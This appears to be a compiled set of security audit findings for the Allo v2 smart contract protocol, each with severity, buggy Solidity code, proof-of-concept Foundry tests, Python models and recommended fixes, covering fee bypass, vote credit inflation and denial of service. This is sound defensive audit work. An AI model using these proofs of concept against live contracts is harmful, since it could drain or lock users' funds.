```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n
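The index collision is easy to see in a minimal Python model of the 4-bits-per-recipient status bitmap. The dict-based state and names below are illustrative stand-ins for the Solidity mappings:

```python
# Hypothetical model of the statuses bitmap (4 bits per recipient, 64 per word).
NONE, PENDING = 0, 1

statuses_bitmap = {}    # rowIndex -> 256-bit word (defaults to 0)
recipient_index = {}    # recipientId -> index (unset entries read as 0, like Solidity)
counter = 0             # bug: recipientsCounter starts at 0

def set_status(rid, status):
    idx = recipient_index.get(rid, 0)
    row, col = idx // 64, (idx % 64) * 4
    word = statuses_bitmap.get(row, 0)
    statuses_bitmap[row] = (word & ~(15 << col)) | (status << col)

def get_status(rid):
    idx = recipient_index.get(rid, 0)
    row, col = idx // 64, (idx % 64) * 4
    return (statuses_bitmap.get(row, 0) >> col) & 15

def register(rid):
    global counter
    if get_status(rid) == NONE:     # new application path
        recipient_index[rid] = counter
        set_status(rid, PENDING)
        counter += 1
        return "new"
    return "update"                 # treated as an existing application

print(register("alice"))  # "new": alice is stored at index 0
print(register("bob"))    # "update": bob's unset index is also 0 -> reads alice's Pending
```

Bob is never stored: his unset mapping entry points at index 0, which already holds Alice's `Pending` status, so the `Status.None` branch is skipped.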
`Anchor.sol` clones generated by `Registry.sol` never work; profile owners cannot use their `Anchor` wallet
high
Add this test to the `Registry.t.sol` test file to reproduce the issue.\\n```\\n    function test_Audit_createProfile() public {\\n        // create profile\\n        bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n        Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n        Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n        console.log("registry address: %s", address(registry()));\\n        console.log("anchor address: %s", profile.anchor);\\n        console.log("anchor.registry: %s", address(_anchor.registry()));\\n\\n        emit log_named_bytes32("profile.id", profile.id);\\n        emit log_named_bytes32("anchor.profile.id", _anchor.profileId());\\n\\n        Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n        assertEq(address(registry()),address(_anchor.registry()) ,"wrong anchor registry");\\n    }\\n```\\n\\nWhat happens with `Anchor.sol` is that it expects `msg.sender` to be the `Registry` contract. But in reality `msg.sender` is a proxy contract generated by Solady during the `CREATE3` operation.\\n```\\n    constructor(bytes32 _profileId) {\\n        registry = Registry(msg.sender);//@audit H: the registry address here is not the Registry. msg.sender is a proxy contract. CREATE3 deploys 2 contracts: one is the proxy, the other is the actual bytecode.\\n        profileId = _profileId;\\n    }\\n```\\n\\nThis can be seen in Solady's comments for the proxy contract. `msg.sender` above is the middleman proxy contract, not the `Registry` contract. Solady generates two contracts during a CREATE3 operation: one is the proxy contract, the second is the actual bytecode.
Pass the registry address as a constructor parameter instead of relying on `msg.sender`:\\n```\\nFile: allo-v2\\contracts\\core\\Registry.sol\\n        bytes memory creationCode = abi.encodePacked(type(Anchor).creationCode, abi.encode(_profileId, address(this))); //@audit fix creation code\\n\\n        // Use CREATE3 to deploy the anchor contract\\n        anchor = CREATE3.deploy(salt, creationCode, 0); \\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n    constructor(bytes32 _profileId, address _registry) {\\n        registry = Registry(_registry);\\n        profileId = _profileId;\\n    }\\n```\\n
The `Anchor.execute()` function will not work because the `registry` address points to the empty proxy contract rather than the actual `Registry`, so all calls will revert.\\n```\\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n    function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n        // Check if the caller is the owner of the profile and revert if not\\n        if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n```\\n\\nProfile owners cannot use their `Anchor` wallet. All funds sent to this `Anchor` contract will be lost forever.
```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log("registry address: %s", address(registry()));\\n console.log("anchor address: %s", profile.anchor);\\n console.log("anchor.registry: %s", address(_anchor.registry()));\\n\\n emit log_named_bytes32("profile.id", profile.id);\\n emit log_named_bytes32("anchor.profile.id", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,"wrong anchor registry");\\n }\\n```\\n
`fundPool` does not work with fee-on-transfer token
medium
In `_fundPool`, the parameter for `increasePoolAmount` is directly the amount used in the `transferFrom` call.\\n```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n\\nWhen `_token` is a fee-on-transfer token, the actual amount transferred to `_strategy` will be less than `amountAfterFee`. Therefore, the current approach could lead to a recorded balance that is greater than the actual balance.
Use the change in `_token` balance as the parameter for `increasePoolAmount`.
The strategy records a pool balance (`poolAmount`) greater than the token balance it actually holds.
```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n
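A short Python simulation makes the accounting gap concrete. The `FeeOnTransferToken` and `Strategy` classes, and the 2% fee rate, are illustrative assumptions, not Allo code:

```python
# Hypothetical model of _fundPool with a 2% fee-on-transfer token.
class FeeOnTransferToken:
    FEE_BPS = 200  # 2% taken on every transfer (assumed for illustration)
    def __init__(self):
        self.balance = {}
    def transfer_from(self, src, dst, amount):
        fee = amount * self.FEE_BPS // 10_000
        self.balance[dst] = self.balance.get(dst, 0) + amount - fee

class Strategy:
    pool_amount = 0
    def increase_pool_amount(self, amount):
        self.pool_amount += amount

token, strategy = FeeOnTransferToken(), Strategy()
amount_after_fee = 1_000
token.transfer_from("funder", "strategy", amount_after_fee)
strategy.increase_pool_amount(amount_after_fee)  # bug: records the pre-fee amount

print(strategy.pool_amount)       # 1000 recorded
print(token.balance["strategy"])  # only 980 actually received
```

The recorded `pool_amount` (1000) exceeds the actual balance (980); measuring the strategy's balance change before and after the transfer closes the gap.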
Exponential Inflation of Voice Credits in Quadratic Voting Strategy
medium
In the given code snippet, we observe a potential issue in the way voice credits are being accumulated for each recipient. The specific lines of code in question are:\\n```\\nfunction _qv_allocate(\\n        // rest of code\\n    ) internal onlyActiveAllocation {\\n        // rest of code\\n        uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n        // rest of code\\n        // get the total credits and calculate the vote result\\n        uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n        // rest of code\\n        //E update allocator mapping voice for this recipient\\n        _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n        // rest of code\\n    }\\n```\\n\\nWe can see that at the end:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] = _allocator.voiceCreditsCastToRecipient[_recipientId] + _voiceCreditsToAllocate + _allocator.voiceCreditsCastToRecipient[_recipientId];\\n```\\n\\nHere, totalCredits accumulates both the newly allocated voice credits (_voiceCreditsToAllocate) and the credits previously cast to this recipient (creditsCastToRecipient). Later on, this totalCredits is added again to `voiceCreditsCastToRecipient[_recipientId]`, thereby including the previously cast credits once more\\nProof of Concept (POC):\\nLet's consider a scenario where a user allocates credits in three separate transactions:\\nTransaction 1: Allocates 5 credits\\ncreditsCastToRecipient initially is 0\\ntotalCredits = 5 (5 + 0)\\nNew voiceCreditsCastToRecipient[_recipientId] = 5\\nTransaction 2: Allocates another 5 credits\\ncreditsCastToRecipient now is 5 (from previous transaction)\\ntotalCredits = 10 (5 + 5)\\nNew voiceCreditsCastToRecipient[_recipientId] = 15 (10 + 5)\\nTransaction 3: Allocates another 5 credits\\ncreditsCastToRecipient now is 15\\ntotalCredits = 20 (5 + 15)\\nNew voiceCreditsCastToRecipient[_recipientId] = 35 (20 + 15)\\nFrom the above, we can see that the voice credits cast to the recipient are exponentially growing with each transaction instead of linearly increasing by 5 each time.
Code should be modified to only add the new voice credits to the recipient's tally. The modified line of code should look like:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] += _voiceCreditsToAllocate;\\n```\\n
Exponential increase in the voice credits attributed to a recipient, significantly skewing the results of the voting strategy (e.g., if one recipient receives 15 votes in a single allocation and another receives 5 votes three times, the second ends up credited with 20 votes versus the first's 15). Over time this allows manipulation and loss of trust in the voting mechanism, and it distorts the share of the pool amount recipients receive, since allocations are used to calculate the match amount distributed from the pool.
```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n
RFPSimpleStrategy milestones can be set multiple times
medium
The `setMilestones` function in the `RFPSimpleStrategy` contract checks whether milestones are already set (`MILESTONES_ALREADY_SET`) by looking at the `upcomingMilestone` index.\\n```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nBut `upcomingMilestone` increases only after distribution, and until then it will always be equal to 0.
Fix condition if milestones should only be set once.\\n```\\nif (milestones.length > 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nOr allow milestones to be reset while they are not in use.\\n```\\nif (milestones.length > 0) {\\n if (milestones[0].milestoneStatus != Status.None) revert MILESTONES_ALREADY_IN_USE();\\n delete milestones;\\n}\\n```\\n
It can accidentally break the pool state or be used with malicious intentions.\\nTwo managers accidentally set the same milestones. Milestones are duplicated and can't be reset, the pool needs to be recreated.\\nThe manager, in cahoots with the recipient, sets milestones one by one, thereby bypassing `totalAmountPercentage` check and increasing the payout amount.
```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n
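A small Python sketch shows why the guard never fires before the first payout. The list-based state and milestone tuples are illustrative stand-ins for the Solidity storage:

```python
# Model of setMilestones' flawed guard.
upcoming_milestone = 0   # only advances when distribute() pays a milestone
milestones = []

def set_milestones(new_milestones):
    # buggy check: before any distribution, upcoming_milestone is still 0,
    # so the "already set" revert can never trigger
    if upcoming_milestone != 0:
        raise RuntimeError("MILESTONES_ALREADY_SET")
    milestones.extend(new_milestones)

set_milestones([("m1", 0.5), ("m2", 0.5)])
set_milestones([("m1", 0.5), ("m2", 0.5)])  # passes again: milestones duplicated
print(len(milestones))                       # 4 instead of 2
```

Checking `len(milestones) > 0` instead (as the recommendation suggests) would reject the second call.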
Allo#_fundPool
medium
Let's see the code of the `_fundPool` function:\\n```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n\\nThe `feeAmount` is calculated as follows:\\n```\\nfeeAmount = (_amount * percentFee) / getFeeDenominator();\\n```\\n\\nwhere `getFeeDenominator` returns `1e18` and `percentFee` is represented like that: `1e18` = 100%, 1e17 = 10%, 1e16 = 1%, 1e15 = 0.1% (from the comments when declaring the variable).\\nLet's say the pool uses a token like GeminiUSD which is a token with 300M+ market cap, so it's widely used, and `percentFee` == 1e15 (0.1%)\\nA user could circumvent the fee by depositing a relatively small amount. In our example, he can deposit 9 GeminiUSD. In that case, the calculation will be: `feeAmount = (_amount * percentFee) / getFeeDenominator() = (9e2 * 1e15) / 1e18 = 9e17/1e18 = 9/10 = 0;`\\nSo the user ends up paying no fee. There is nothing stopping the user from funding his pool by invoking the `fundPool` with such a small amount as many times as he needs to fund the pool with whatever amount he chooses, circumventing the fee.\\nEspecially with the low gas fees on L2s on which the protocol will be deployed, this will be a viable method to fund a pool without paying any fee to the protocol.
Add a `minFundAmount` variable and check for it when funding a pool.
The protocol doesn't collect fees from pools with low decimal tokens.
```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n
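The rounding arithmetic from the description can be verified directly; this reproduces the report's numbers (a 2-decimals token such as GUSD, `percentFee = 1e15`) in Python's integer division, which behaves like Solidity's:

```python
# Fee calculation from _fundPool, with the report's example values.
FEE_DENOMINATOR = 10**18
percent_fee = 10**15        # 0.1%

amount = 9 * 10**2          # 9 tokens with 2 decimals = 9e2 base units
fee_amount = amount * percent_fee // FEE_DENOMINATOR  # floor division, as in Solidity
print(fee_amount)           # 0 -> the funder pays no protocol fee on this deposit
```

Repeating such 9-token deposits funds the pool fee-free; a 10-token deposit would pay a fee of 1 base unit, so a `minFundAmount` floor removes the incentive to split deposits.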
`RFPSimpleStrategy._registerRecipient()` does not work when the strategy was created with `useRegistryAnchor=true`, so nobody can register for the pool
medium
`RFPSimpleStrategy` strategies can be created with `useRegistryAnchor`, which indicates whether to use the registry anchor or not. If the pool is created with `useRegistryAnchor=true`, `RFPSimpleStrategy._registerRecipient()` reverts with `RECIPIENT_ERROR`. The problem is that when `useRegistryAnchor` is true, the variable `recipientAddress` is never assigned, so the function reverts with `RECIPIENT_ERROR`.\\nI created a test where the strategy is created with `useRegistryAnchor=true`; the `registerRecipient()` call then reverts with `RECIPIENT_ERROR`.\\n```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test "test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue" -vvv\\n//\\n    function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n        // The registerRecipient() function does not work when the strategy was created using\\n        // useRegistryAnchor = true.\\n        //\\n        bool useRegistryAnchorTrue = true;\\n        RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), "RFPSimpleStrategy");\\n\\n        vm.prank(pool_admin());\\n        poolId = allo().createPoolWithCustomStrategy(\\n            poolProfile_id(),\\n            address(custom_strategy),\\n            abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n            NATIVE,\\n            0,\\n            poolMetadata,\\n            pool_managers()\\n        );\\n        //\\n        // Create profile1 metadata and anchor\\n        Metadata memory metadata = Metadata({protocol: 1, pointer: "metadata"});\\n        address anchor = profile1_anchor();\\n        bytes memory data = abi.encode(anchor, 1e18, metadata);\\n        //\\n        // Profile1 member registers to the pool but it is reverted by RECIPIENT_ERROR\\n        vm.startPrank(address(profile1_member1()));\\n        vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n        allo().registerRecipient(poolId, data);\\n    }\\n```\\n
When the strategy is using `useRegistryAnchor=true`, get the `recipientAddress` from the data:\\n```\\n    function _registerRecipient(bytes memory _data, address _sender)\\n        internal\\n        override\\n        onlyActivePool\\n        returns (address recipientId)\\n    {\\n        bool isUsingRegistryAnchor;\\n        address recipientAddress;\\n        address registryAnchor;\\n        uint256 proposalBid;\\n        Metadata memory metadata;\\n\\n        // Decode '_data' depending on the 'useRegistryAnchor' flag\\n        if (useRegistryAnchor) {\\n            /// @custom:data when 'true' -> (address recipientId, uint256 proposalBid, Metadata metadata)\\n-           (recipientId, proposalBid, metadata) = abi.decode(_data, (address, uint256, Metadata));\\n+           (recipientId, recipientAddress, proposalBid, metadata) = abi.decode(_data, (address, address, uint256, Metadata));\\n\\n            // If the sender is not a profile member this will revert\\n            if (!_isProfileMember(recipientId, _sender)) revert UNAUTHORIZED();\\n```\\n
A pool created with a strategy using `useRegistryAnchor=true` cannot get registrants because `_registerRecipient()` always reverts. If the pool is funded but nobody can be allocated to, since there are no registered recipients, funds deposited by others may be trapped because they are never distributed.
```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test "test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), "RFPSimpleStrategy");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: "metadata"});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n
`_distribute()` function in RFPSimpleStrategy contract has a wrong requirement, causing DOS
medium
The function _distribute():\\n```\\n    function _distribute(address[] memory, bytes memory, address _sender)\\n        internal\\n        virtual\\n        override\\n        onlyInactivePool\\n        onlyPoolManager(_sender)\\n    {\\n        // rest of code\\n\\n        IAllo.Pool memory pool = allo.getPool(poolId);\\n        Milestone storage milestone = milestones[upcomingMilestone];\\n        Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n        if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n        uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n        poolAmount -= amount;//<@@ NOTICE the poolAmount decreases over time\\n\\n        _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n        // rest of code\\n    }\\n```\\n\\nLet's suppose this scenario:\\nThe pool manager funds the contract with 100 tokens, making the `poolAmount` variable equal to 100\\nThe pool manager sets 5 equal milestones of 20% each\\nThe selected recipient's proposal bid is 100, making the `recipients[acceptedRecipientId].proposalBid` variable equal to 100\\nAfter milestone 1 is done, the pool manager pays the recipient using `distribute()`. Value of variables after: `poolAmount = 80, recipients[acceptedRecipientId].proposalBid = 100`\\nAfter milestone 2 is done, the pool manager will get a DOS trying to pay the recipient using `distribute()` because of this line:\\n```\\nif (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n
```\\n- if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n+ if ((recipient.proposalBid * milestone.amountPercentage) / 1e18 > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n
This behaviour will cause DOS when distributing the 2nd milestone or higher
```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n
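The scenario above can be walked through in Python; the numbers mirror the description (100-token pool, 100-token bid, 20% milestones) and the harness itself is illustrative:

```python
# Model of _distribute's buggy funds check.
pool_amount = 100
proposal_bid = 100
milestone_pct = 0.2  # five equal milestones of 20% each

def distribute():
    global pool_amount
    # buggy guard: compares the FULL bid against the remaining pool,
    # instead of only this milestone's share of the bid
    if proposal_bid > pool_amount:
        raise RuntimeError("NOT_ENOUGH_FUNDS")
    amount = int(proposal_bid * milestone_pct)
    pool_amount -= amount

distribute()            # milestone 1 pays 20, pool_amount drops to 80
try:
    distribute()        # milestone 2: 100 > 80 -> reverts
    reverted = False
except RuntimeError:
    reverted = True
print(reverted)         # True: every later milestone is blocked
```

Comparing `proposal_bid * milestone_pct` against `pool_amount`, as the recommendation suggests, lets the remaining milestones pay out.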
`QVBaseStrategy::reviewRecipients()` doesn't check if the recipient is already accepted or rejected, and overwrites the current status
medium
In the QV strategy contracts, recipients register themselves and wait for a pool manager to accept the registration. Pool managers can accept or reject recipients with the `reviewRecipients()` function. There is also a threshold (reviewThreshold) for recipients to be accepted. For example, if the `reviewThreshold` is 2, a pending recipient gets accepted when two managers accept this recipient and the `recipientStatus` is updated.\\nHowever, `QVBaseStrategy::reviewRecipients()` function doesn't check the recipient's current status. This one alone may not be an issue because managers may want to change the status of the recipient etc.\\nBut on top of that, the function also doesn't take the previous review counts into account when updating the status, and overwrites the status immediately after reaching the threshold. I'll share a scenario about this below.\\n```\\nfile: QVBaseStrategy.sol\\n    function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n        external\\n        virtual\\n        onlyPoolManager(msg.sender)\\n        onlyActiveRegistration\\n    {\\n        // make sure the arrays are the same length\\n        uint256 recipientLength = _recipientIds.length;\\n        if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n        for (uint256 i; i < recipientLength;) {\\n            Status recipientStatus = _recipientStatuses[i];\\n            address recipientId = _recipientIds[i];\\n\\n            // if the status is none or appealed then revert\\n            if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuses, not the recipient's status.\\n                revert RECIPIENT_ERROR(recipientId);\\n            }\\n\\n            reviewsByStatus[recipientId][recipientStatus]++;\\n\\n    -->     if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n                Recipient storage recipient = recipients[recipientId];\\n                recipient.recipientStatus = recipientStatus;\\n\\n                emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n            }\\n\\n            emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n            unchecked {\\n                ++i;\\n            }\\n        }\\n    }\\n```\\n\\nAs I mentioned above, the function updates the `recipientStatus` immediately after reaching the threshold. Here is a scenario of why this might be an issue.\\nExample Scenario\\nThe pool has 5 managers and the `reviewThreshold` is 2.\\nThe first manager rejects the recipient\\nThe second manager accepts the recipient\\nThe third manager rejects the recipient. -> `recipientStatus` updated -> `status = REJECTED`\\nThe fourth manager rejects the recipient -> status still `REJECTED`\\nThe last manager accepts the recipient -> `recipientStatus` updated again -> `status = ACCEPTED`\\n3 managers rejected and 2 managers accepted the recipient but the recipient status is overwritten without checking the recipient's previous status and is ACCEPTED now.\\nCoded PoC\\nYou can prove the scenario above with the PoC. You can use the protocol's own setup for this.\\n- Copy the snippet below and paste it into the `QVBaseStrategy.t.sol` test file.\\n- Run `forge test --match-test test_reviewRecipient_reviewTreshold_OverwriteTheLastOne`\\n```\\n//@audit More managers rejected but the recipient is accepted\\n    function test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() public virtual {\\n        address recipientId = __register_recipient();\\n\\n        // Create rejection status\\n        address[] memory recipientIds = new address[](1);\\n        recipientIds[0] = recipientId;\\n        IStrategy.Status[] memory Statuses = new IStrategy.Status[](1);\\n        Statuses[0] = IStrategy.Status.Rejected;\\n\\n        // Reject three times with different managers\\n        vm.startPrank(pool_manager1());\\n        qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n        vm.startPrank(pool_manager2());\\n        qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n        vm.startPrank(pool_manager3());\\n        qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n        // Three managers rejected. Status will be rejected.\\n        assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Rejected));\\n        assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n\\n        // Accept two times after three rejections\\n        Statuses[0] = IStrategy.Status.Accepted;\\n        vm.startPrank(pool_admin());\\n        qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n        vm.startPrank(pool_manager4());\\n        qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n        // 3 Rejected, 2 Accepted, but status is Accepted because it overwrites right after passing threshold.\\n        assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Accepted));\\n        assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n        assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Accepted), 2);\\n    }\\n```\\n\\nYou can find the test results below:\\n```\\nRunning 1 test for test/foundry/strategies/QVSimpleStrategy.t.sol:QVSimpleStrategyTest\\n[PASS] test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() (gas: 249604)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.92ms\\n```\\n
Checking the review counts before updating the state might be helpful to mitigate this issue
Recipient status might be overwritten with less review counts.
```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n
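The overwrite logic can be modelled in Python, replaying the report's exact review order (reject, accept, reject, reject, accept). The dict-based tallies and names are illustrative:

```python
# Model of reviewRecipients' threshold logic with reviewThreshold = 2.
REVIEW_THRESHOLD = 2
reviews = {"Rejected": 0, "Accepted": 0}
recipient_status = "Pending"

def review(status):
    global recipient_status
    reviews[status] += 1
    # bug: overwrites unconditionally once THIS status reaches the threshold,
    # ignoring how many reviews the opposite status already accumulated
    if reviews[status] >= REVIEW_THRESHOLD:
        recipient_status = status

for s in ["Rejected", "Accepted", "Rejected", "Rejected", "Accepted"]:
    review(s)

print(recipient_status)  # "Accepted" despite 3 rejections vs. 2 acceptances
```

The last acceptance pushes the "Accepted" tally to the threshold and overwrites the previously settled "Rejected" status, exactly as in the Foundry PoC.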
CREATE3 is not available in the zkSync Era.
medium
